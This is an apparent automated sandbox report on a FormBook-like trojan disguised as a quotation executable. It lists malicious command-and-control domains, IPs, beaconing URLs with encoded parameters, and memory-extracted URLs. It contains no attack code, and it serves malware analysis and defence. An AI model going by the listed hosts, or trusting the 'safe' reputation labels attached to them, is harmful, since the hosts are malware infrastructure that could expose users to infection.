            http://www.gate-eight.net/zbwq/?mvjDMBx8=yiu0kyrMDZDnaGSHUN6l2/AWenBEPojQbvIrsSiIoULw3Ja/Kxh4uhHPf3lVqybB3F8SgOCipbonbrybGxTRaMG4SCnpngzzUdFAxyNhxQ0Fwwko6x3YD+nfuTkI7r5rP6BNPZw=&AT=RrjDj4Z85jYPlHG00%Avira URL Cloudsafe
            http://www.personal-loans-jp8.xyz/osae/?mvjDMBx8=ajGs1OnhgmOjGH0rS1+XMzuDhBRwUFVs9ujDJ3TY3TM9Xr/glBZes+ajendbW/hUbvaGBM0AJFcTAGb0Z858EyBkLc9l3gETAt5Zd72AqHMe/3ljZLi/M9TCgc1RD8Nq02402TA=&AT=RrjDj4Z85jYPlHG00%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            glitterinthegrey.shop
            		84.32.84.32
            		truetrueunknown
            yuanda.zhongshengxinyun.com
            		119.28.49.194
            		truetrue
              		unknown
              staffmasters.online
              		84.32.84.32
              		truetrue
                		unknown
                sorriragora.online
                		162.240.81.18
                		truetrue
                  		unknown
                  www.personal-loans-jp8.xyz
                  		199.59.243.226
                  		truetrue
                    		unknown
                    www.indeks.space
                    		194.58.112.174
                    		truetrueunknown
                    www.kamicare-com.tokyo
                    		157.7.44.213
                    		truetrueunknown
                    adindadisini15.click
                    		172.96.186.147
                    		truetrueunknown
                    gate-eight.net
                    		92.204.210.213
                    		truetrue
                      		unknown
                      natroredirect.natrocdn.com
                      		85.159.66.93
                      		truetrueunknown
                      www.cchelvn.shop
                      		172.67.220.161
                      		truetrueunknown
                      www.stolex.top
                      		162.0.239.141
                      		truetrue
                        		unknown
                        globyglen.info
                        		3.33.130.190
                        		truetrue
                          		unknown
                          www.healthsolutions.top
                          		13.248.169.48
                          		truetrueunknown
                          www.techcables.shop
                          		194.195.220.41
                          		truetrue
                            		unknown
                            www.gate-eight.net
                            		unknown
                            		unknowntrue
                              		unknown
                              www.staffmasters.online
                              		unknown
                              		unknowntrue
                                		unknown
                                www.sorriragora.online
                                		unknown
                                		unknowntrueunknown
                                www.kontorpaneli.xyz
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.adindadisini15.click
                                  		unknown
                                  		unknowntrueunknown
                                  www.cs0724sd92jj.cloud
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.globyglen.info
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.glitterinthegrey.shop
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.globyglen.info/76oh/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.kamicare-com.tokyo/sryw/?mvjDMBx8=i/J+8XVQTUqjXYi8BOJp91HUxYZ+c6AWCRJ9n1NtfUqKWarFGtf7pFdZZISJr4cvaVfHP+3ktlD0OUvuvz/pl/98wVf2KGrKM2ftp+skyT71Gb7AHg6oN/3q8TTnk2KegzCTKXU=&AT=RrjDj4Z85jYPlHG0true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.adindadisini15.click/vufj/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.indeks.space/mjy7/?AT=RrjDj4Z85jYPlHG0&mvjDMBx8=cg99eHdIhH6PRmBvzzsY4n38eZmBksl3PUY+KkgGmlThXL3WC2dP6WW67TtKoTiLnNtMIhIq0So6UKQjTmNbIq3Et/8UbAXoANeZC4OXTx0MozCDv0bkromw6gd6nEy8FhxsXmw=true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.glitterinthegrey.shop/zch2/true
                                        • 1%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.glitterinthegrey.shop/zch2/?mvjDMBx8=aE5KdauoI4Y2umflLKCriqVYTdzyJYOxKMaFRYlB9+Sv37Nuz5MD+L3RaAAlRIcvVgOa2tpXA3nWnQsvE78wTxh4OatPeg0Yh8Bm15yxUJXRh7FOvkM1aT2MQQJBhGDX4aCwZoM=&AT=RrjDj4Z85jYPlHG0true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.healthsolutions.top/p2w8/?mvjDMBx8=0JI5pBGkrmioG/Anacpz3k+IMSt3VJctkawy5IUNmMBmvSb9+k0qoiMhp0vaP6Gu/r9KODYGeXzVD0cydytp7UCw+eBZByGBQdX9huLjshPWbKtQplNWiDD8YzK/NJ1wwprBY8Q=&AT=RrjDj4Z85jYPlHG0true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.personal-loans-jp8.xyz/osae/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.staffmasters.online/0jqq/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.cs0724sd92jj.cloud/dk4s/?mvjDMBx8=3h/m6gEkIEYHXtcNJZ5C3CADcygHFzVsLbB7LXK+s4FKSFcfshdIf9ZYkD73wqhGP2I3Lsc8IXkGColEMvp7YUHZOAuQGwzpl+pcDPhm8cR3ChF/e3R/pt7cs4gBzisZlZ7cEhY=&AT=RrjDj4Z85jYPlHG0true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.stolex.top/kunq/?AT=RrjDj4Z85jYPlHG0&mvjDMBx8=e2pBBNKfhlcNZug/MlikLwl2FbwO8O5PulKDyYpFlUnCxZtvvcHmj1jMPp0LVU20n2VhUZuzz0qV7Mfxt0dNEDuQKyzOHg8PupeV8YN8l6deJxHpy2VUY+/g7EuAZK4kmgb6d+0=true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.techcables.shop/0hup/?AT=RrjDj4Z85jYPlHG0&mvjDMBx8=dEhQ1XEV2cGux7LKlL+scgcBfO64DeKcVe19yXl7eYIZvhBzatxTyUaQx2TCVW77GzJhrYbmnII2KrJyLin2/kNdYev+ljAzma1yOM1J7qbV9Zx9z1N3S/Qs4ysm8OEw2XKCNmo=true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.kontorpaneli.xyz/pziu/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.staffmasters.online/0jqq/?mvjDMBx8=AboyIhWIgkAsu1nqRInTjiDB5La4qA9HyyvfFBNZK/fCO9WV0V/gZMn0uKI8YjcOlIWVaRm32fVlTzhGJzR60qB7FB0ybEu2AENms3yOanM/608x1TKdZl2B8TKOA7VaQ/jM9wk=&AT=RrjDj4Z85jYPlHG0true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.kamicare-com.tokyo/sryw/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.indeks.space/mjy7/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.healthsolutions.top/p2w8/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.cs0724sd92jj.cloud/dk4s/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.sorriragora.online/4jqu/?mvjDMBx8=7Y4E7U2NZPWflm9zHmqMqimi+5VuLrMg6kjCj1EInif9PGb3NGzDdsXjsV7gO/0L54/q7blUjcSlxFaP/BkUPUPxQ1br5RU9Wx45qk4zaFXeqdDODb3rhKjRzSvczwWVhnNF6PY=&AT=RrjDj4Z85jYPlHG0true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.stolex.top/kunq/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.cchelvn.shop/q1r7/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.kontorpaneli.xyz/pziu/?AT=RrjDj4Z85jYPlHG0&mvjDMBx8=EY+qgcjcqEvJaY+ALfwoPip36wdjh3xsdSy6XMjMfPv/Ir5Xz5+nGIw7jjJwblfp8IgSbQk1nTysBGMjrt/hxs8d+JiTcx1VzVYwtbha6lbR616oEW2vuE+H/qKkyJ7RSqcP4eo=true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.sorriragora.online/4jqu/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.adindadisini15.click/vufj/?mvjDMBx8=+HD5AwEaNmB+2iuNGAXu8ZEboMIZq6yiRKp9PVW508Es4ofR/Ro4n6j7lKcu3Nlg5pjwPTuirHLo0Y+yTcgc2ol0tGxsrzJn3Qwp0zn1So0PhkHXRjdNu1v/OX+x6wvNfDHKpos=&AT=RrjDj4Z85jYPlHG0true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.globyglen.info/76oh/?mvjDMBx8=bkikPFO0y+dZ8FJVAZCFc8SLSjnSdRJGJM46ftFXLQOb8YZCjaJwx2qDHjBW5y2pzyppecjshIN6jiWBoFnF0mIbwCR4LMrqk0QV5plBln1dX3G3XbOh6jVBwPa42yOCsK/pJQQ=&AT=RrjDj4Z85jYPlHG0true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.techcables.shop/0hup/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.personal-loans-jp8.xyz/osae/?mvjDMBx8=ajGs1OnhgmOjGH0rS1+XMzuDhBRwUFVs9ujDJ3TY3TM9Xr/glBZes+ajendbW/hUbvaGBM0AJFcTAGb0Z858EyBkLc9l3gETAt5Zd72AqHMe/3ljZLi/M9TCgc1RD8Nq02402TA=&AT=RrjDj4Z85jYPlHG0true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.gate-eight.net/zbwq/?mvjDMBx8=yiu0kyrMDZDnaGSHUN6l2/AWenBEPojQbvIrsSiIoULw3Ja/Kxh4uhHPf3lVqybB3F8SgOCipbonbrybGxTRaMG4SCnpngzzUdFAxyNhxQ0Fwwko6x3YD+nfuTkI7r5rP6BNPZw=&AT=RrjDj4Z85jYPlHG0true
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://www.techcables.shop/0hup?gp=1&js=1&uuid=1724741004.9758137820&other_args=eyJ1cmkiOiAiLzBodXAiuExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000004120000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003FD0000.00000004.10000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://duckduckgo.com/chrome_newtabPING.EXE, 00000009.00000002.4574773429.0000000007538000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.reg.ru/web-sites/website-builder/?utm_source=www.indeks.space&utm_medium=parking&utm_camuExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://duckduckgo.com/ac/?q=PING.EXE, 00000009.00000002.4574773429.0000000007538000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://reg.ruuExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.reg.ru/hosting/?utm_source=www.indeks.space&utm_medium=parking&utm_campaign=s_land_host&uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.reg.ru/web-sites/?utm_source=www.indeks.space&utm_medium=parking&utm_campaign=s_land_cmsuExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.cchelvn.shopuExImirYECsTjI.exe, 00000008.00000002.4575428088.000000000585E000.00000040.80000000.00040000.00000000.sdmpfalse
                                        • 1%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www70.techcables.shop/PING.EXE, 00000009.00000002.4572589856.0000000003FD0000.00000004.10000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=PING.EXE, 00000009.00000002.4574773429.0000000007538000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://www.reg.ru/whois/?check=&dname=www.indeks.space&amp;reg_source=parking_autouExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://gate-eight.net/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=4.01uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000037B4000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003664000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2755349497.000000003F914000.00000004.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.google.comuExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000048FA000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4574589636.0000000005A30000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://gate-eight.net/wp-content/plugins/under-construction-page/themes/images/favicon.pnguExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000037B4000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003664000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2755349497.000000003F914000.00000004.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://nginx.net/uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000004C1E000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000004ACE000.00000004.10000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://fedoraproject.org/uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000004C1E000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000004ACE000.00000004.10000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://gate-eight.net/wp-content/plugins/under-construction-page/themes/css/font-awesome.min.css?v=4uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000037B4000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003664000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2755349497.000000003F914000.00000004.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://gate-eight.net/wp-content/plugins/under-construction-page/themes/light_bulb/style.css?v=4.01uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000037B4000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003664000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2755349497.000000003F914000.00000004.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchPING.EXE, 00000009.00000002.4574773429.0000000007538000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://www.reg.ru/dedicated/?utm_source=www.indeks.space&utm_medium=parking&utm_campaign=s_land_seruExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.cs0724sd92jj.cloud/dk4s/?mvjDMBx8=3h/m6gEkIEYHXtcNJZ5C3CADcygHFzVsLbB7LXKuExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003C6A000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003B1A000.00000004.10000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://fonts.bunny.net/css?family=Nunito:400uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000037B4000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003664000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2755349497.000000003F914000.00000004.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://gate-eight.net/wp-content/plugins/under-construction-page/themes/css/common.css?v=4.01uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000037B4000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003664000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2755349497.000000003F914000.00000004.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=PING.EXE, 00000009.00000002.4574773429.0000000007538000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://gate-eight.net/wp-includes/js/jquery/jquery.min.jsuExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000037B4000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003664000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2755349497.000000003F914000.00000004.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://parking.reg.ru/script/get_domain_data?domain_name=www.indeks.space&rand=uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.ecosia.org/newtab/PING.EXE, 00000009.00000002.4574773429.0000000007538000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://www.reg.ru/domain/new/?utm_source=www.indeks.space&utm_medium=parking&utm_campaign=s_land_neuExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://ac.ecosia.org/autocomplete?q=PING.EXE, 00000009.00000002.4574773429.0000000007538000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://adindadisini15.click/vufj/?mvjDMBx8=uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000042B2000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000004162000.00000004.10000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=PING.EXE, 00000009.00000002.4574773429.0000000007538000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://gate-eight.net/wp-content/plugins/under-construction-page/themes/light_bulb/light_bulb_off.pnuExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000037B4000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003664000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2755349497.000000003F914000.00000004.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        162.240.81.18
                                        		sorriragora.onlineUnited States
                                        		46606UNIFIEDLAYER-AS-1UStrue
                                        194.195.220.41
                                        		www.techcables.shopGermany
                                        		6659NEXINTO-DEtrue
                                        13.248.169.48
                                        		www.healthsolutions.topUnited States
                                        		16509AMAZON-02UStrue
                                        157.7.44.213
                                        		www.kamicare-com.tokyoJapan7506INTERQGMOInternetIncJPtrue
                                        84.32.84.32
                                        		glitterinthegrey.shopLithuania
                                        		33922NTT-LT-ASLTtrue
                                        199.59.243.226
                                        		www.personal-loans-jp8.xyzUnited States
                                        		395082BODIS-NJUStrue
                                        92.204.210.213
                                        		gate-eight.netGermany
                                        		29066VELIANET-ASvelianetInternetdiensteGmbHDEtrue
                                        85.159.66.93
                                        		natroredirect.natrocdn.comTurkey
                                        		34619CIZGITRtrue
                                        119.28.49.194
                                        		yuanda.zhongshengxinyun.comChina
                                        		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNtrue
                                        172.67.220.161
                                        		www.cchelvn.shopUnited States
                                        		13335CLOUDFLARENETUStrue
                                        172.96.186.147
                                        		adindadisini15.clickCanada
                                        		32475SINGLEHOP-LLCUStrue
                                        162.0.239.141
                                        		www.stolex.topCanada
                                        		22612NAMECHEAP-NETUStrue
                                        194.58.112.174
                                        		www.indeks.spaceRussian Federation
                                        		197695AS-REGRUtrue
                                        3.33.130.190
                                        		globyglen.infoUnited States
                                        		8987AMAZONEXPANSIONGBtrue

                                        General Information

                                        Joe Sandbox version:40.0.0 Tourmaline
                                        Analysis ID:1499588
                                        Start date and time:2024-08-27 08:40:10 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 11m 5s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:12
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:Quotation-27-08-24.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@9/2@15/14
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 96%
                                        • Number of executed functions: 199
                                        • Number of non-executed functions: 297
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                        Warnings

                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        02:41:02API Interceptor1x Sleep call for process: Quotation-27-08-24.exe modified
                                        02:42:14API Interceptor10538065x Sleep call for process: PING.EXE modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        162.240.81.18RFQ# 2200002827.exeGet hashmaliciousFormBookBrowse
                                        • www.7hubmt.online/xbib/
                                        RFQ# 2200002827.exeGet hashmaliciousFormBookBrowse
                                        • www.7hubmt.online/xbib/
                                        DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                        • www.agoraeubebo.com/rs2o/
                                        QUOTATION - RFQ# 2200002827.exeGet hashmaliciousFormBookBrowse
                                        • www.7hubmt.online/xbib/
                                        Availability and prices - inquiry.exeGet hashmaliciousFormBookBrowse
                                        • www.7hubmt.online/xbib/
                                        Atlas Copco- WEPCO.exeGet hashmaliciousFormBookBrowse
                                        • www.meery.store/6qht/
                                        Filename.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                        • www.meery.store/i9fy/
                                        DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                        • www.agoraeubebo.com/rs2o/
                                        AED 47,000.exeGet hashmaliciousFormBookBrowse
                                        • www.marinamaquiagens.online/n4sv/
                                        NEW RFQ - Viasat LSDR.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                        • www.agoraeubebo.com/rs2o/?vXuxe=vKM0jx2A8ILKc4GmmMsGgLmtCp8CPHru67h/kXleB/ZoklcW2SID1aPH+qN/sKOgEXtCPUzIa43TynAKcyiqMUkMFhm7u6X5KFdiL4Z1REYUn8ting==&xPN=kZVT_
                                        194.195.220.41TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exeGet hashmaliciousFormBookBrowse
                                        • www.ytonetgearhub.shop/l8y2/
                                        swift_payment_pdf.exeGet hashmaliciousFormBookBrowse
                                        • www.cheapdesklamp.shop/9nq7/
                                        13.248.169.48DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                        • www.dyme.tech/bduc/
                                        Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                        • pupydeq.com/login.php
                                        roundwood.exeGet hashmaliciousSimda StealerBrowse
                                        • pupydeq.com/login.php
                                        PI#220824.exeGet hashmaliciousFormBookBrowse
                                        • www.magicface.shop/4rft/
                                        RFQ-230802024.PDF.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                        • www.southview.shop/ngcd/?QdH=e6U0w0z2idbs1IxLly0R81z+0wl+Hb7S1UJLlmurxc1wTOaKvNXFR8zQd5bB3MhsqM8egUPWk2cCVebAiXklTF0ubmVOlLNe7x1tjrzBfwL4ICdW7a1vW+k=&oHf=JBV8
                                        Atlas Copco- WEPCO.exeGet hashmaliciousFormBookBrowse
                                        • www.dyme.tech/450c/
                                        PI #9100679047.exeGet hashmaliciousFormBookBrowse
                                        • www.magicface.shop/4rft/?6fQ=evG0&gLc=FGuVzxt8QNTBaf28BjdMiv1EEcdUBkGOYB7XBXv5WUU9/yiW5DXWiT4ONGgR1X+uJFp1s83LBYOZMM1xVMldblMGBwVXJ+mF1vvWAjaGmLB1FgewMwb6BpI=
                                        Shipping Documents.exeGet hashmaliciousFormBookBrowse
                                        • www.magicface.shop/4rft/
                                        qEW7hMvyV7.exeGet hashmaliciousFormBookBrowse
                                        • www.getjobspie.com/xkxq/
                                        Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                        • www.magicface.shop/gir9/

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        yuanda.zhongshengxinyun.comAtlas Copco- WEPCO.exeGet hashmaliciousFormBookBrowse
                                        • 119.28.49.194
                                        natroredirect.natrocdn.com#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 85.159.66.93
                                        AIDHL3290435890.exeGet hashmaliciousFormBookBrowse
                                        • 85.159.66.93
                                        PO#4510065525.exeGet hashmaliciousFormBookBrowse
                                        • 85.159.66.93
                                        RFQ# 2200002827.exeGet hashmaliciousFormBookBrowse
                                        • 85.159.66.93
                                        RFQ# 2200002827.exeGet hashmaliciousFormBookBrowse
                                        • 85.159.66.93
                                        PI#220824.exeGet hashmaliciousFormBookBrowse
                                        • 85.159.66.93
                                        Availability and prices - inquiry.exeGet hashmaliciousFormBookBrowse
                                        • 85.159.66.93
                                        ptsss.exeGet hashmaliciousFormBookBrowse
                                        • 85.159.66.93
                                        z1DOCUMENTINV.exeGet hashmaliciousFormBookBrowse
                                        • 85.159.66.93
                                        Atlas Copco- WEPCO.exeGet hashmaliciousFormBookBrowse
                                        • 85.159.66.93
                                        www.indeks.spaceTRIAL_ORDER_OTHERS.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 194.58.112.174

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        INTERQGMOInternetIncJPINVG0088 LHV3495264 BL327291535V.exeGet hashmaliciousFormBookBrowse
                                        • 160.251.148.115
